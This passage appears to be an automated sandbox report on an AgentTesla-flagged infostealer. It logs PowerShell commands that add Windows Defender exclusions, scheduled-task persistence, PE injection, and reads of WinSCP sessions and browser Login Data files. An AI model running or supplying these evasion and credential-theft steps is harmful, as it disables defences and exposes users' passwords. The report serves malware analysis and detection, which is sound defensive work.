                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96013
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 95906
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 95784
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 95672
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 95563
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 95453
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 95344
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 95235
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 95110
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 94985
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 94860
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 94735
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 94609
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 94500
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 94391
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 94281
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 94172
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 94047
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 93938
                    Source: jKqPSehspS.exe, 00000009.00000002.3944382197.0000000001325000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                    Source: BLpvFR.exe, 0000000E.00000002.3943193696.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory written: C:\Users\user\Desktop\jKqPSehspS.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory written: C:\Users\user\AppData\Roaming\BLpvFR.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Users\user\Desktop\jKqPSehspS.exe "C:\Users\user\Desktop\jKqPSehspS.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess created: C:\Users\user\AppData\Roaming\BLpvFR.exe "C:\Users\user\AppData\Roaming\BLpvFR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Users\user\Desktop\jKqPSehspS.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Users\user\Desktop\jKqPSehspS.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Users\user\AppData\Roaming\BLpvFR.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Users\user\AppData\Roaming\BLpvFR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: jKqPSehspS.exe PID: 1308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jKqPSehspS.exe PID: 6784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BLpvFR.exe PID: 7408, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
